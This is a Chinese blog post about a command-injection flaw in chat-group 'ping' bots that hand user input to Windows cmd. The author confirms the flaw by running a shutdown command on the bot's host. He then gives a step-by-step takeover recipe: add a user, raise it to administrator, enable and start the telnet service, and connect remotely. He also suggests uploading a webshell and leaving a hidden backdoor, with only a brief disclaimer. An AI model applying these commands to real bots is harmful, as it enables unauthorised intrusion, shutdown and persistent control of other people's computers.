本站原创 ping机器人记一次偶然发现的漏洞
很多群里都会有这样的ping机器人,就像这样
先科普一下ping是什么东西
就是一个网络诊断工具,判断网络是否通畅以及速度怎么样
具体请自行百度:链接在此:ping-百度百科
好,进入正题,因为一次偶然的机会
我听说,有些机器人的ping并非机器人来测速,是直接用cmd进行测速
于是做了以下测试
机器人反馈给我一个信息
这个ip可能是这个机器人的共享ip,
我们得到以下结果,说明命令成功的被执行
我所输入的shutdown -s -t 1
意思是一秒后电脑关机(Windows系统的cmd,也叫dos系统)
这就有了以下思路
1.利用一次上面的命令,ping到一个它自身的ip(如果运气好,是它本身)
2.利用命令创建一个用户
3.进行提权,升级用户为超级管理员权限
4.开启telnet权限,打开端口(如果对方为IIS,或许可以ftp传入小马,等等,思路很广阔)
5.执行本地的远程连接进行连接,就可以控制对方电脑了
这就成功的进行了渗透,后面的事情就自己解决了
例如开隐形后门,当然,不建议各位这么做,只是做一个学习和试验
下面是上面涉及的命令,均以Windows系统为准,思路去渗透linux系统也是可以的
1.
ping xxx.xxx.xxx.xxx(ip或者网址)
例如:ping www.aqyzit.cn
2.
net user 用户名 密码 /add
创建一个用户,名为:123密码为:456
net user 123 456 /add
当然也可以不设置密码,不设置密码只要不打上密码就可以了,如:
net user 123 /add
3.
然后就加入管理员组了:
net localgroup administrators 用户名 /add
还用上面的那个账号来做,如:net localgroup administrators 123 /add
4.
telnet IP地址 端口号
cmd下开启代码:sc config tlntsvr start= auto
net start telnet
具体情况请参照,不作详细介绍:cmd下开启telnet的方法
5.打开本地的cmd
mstsc,打开本地的远程登录
那么这次记录就到这里,可能途中有些注意事项并未提及,但是大概思路就是这样,希望各位有所学习,讲得不好或者不对请指出
本站原创文章,转载请联系,或留下联系方式
作者:不将就 联系QQ:2716301893
本文链接:http://www.ayuwl.cn/?id=158
版权声明:转载请带上版权原创为《阿宇资源网》
本站资源来自互联网侵权联系删除
发表评论 取消回复
还没有评论,快来说点什么吧~
分享:
支付宝
微信


最新留言
噜啦啦噜啦啦
我需 评论于:02-20
666666666666666666666
666666 评论于:02-20
1234567876432
孤独的怪盗 评论于:02-20
1234567876432
孤独的怪盗 评论于:02-20
1111111
aszzz 评论于:02-20
能下载不?
asd 评论于:02-20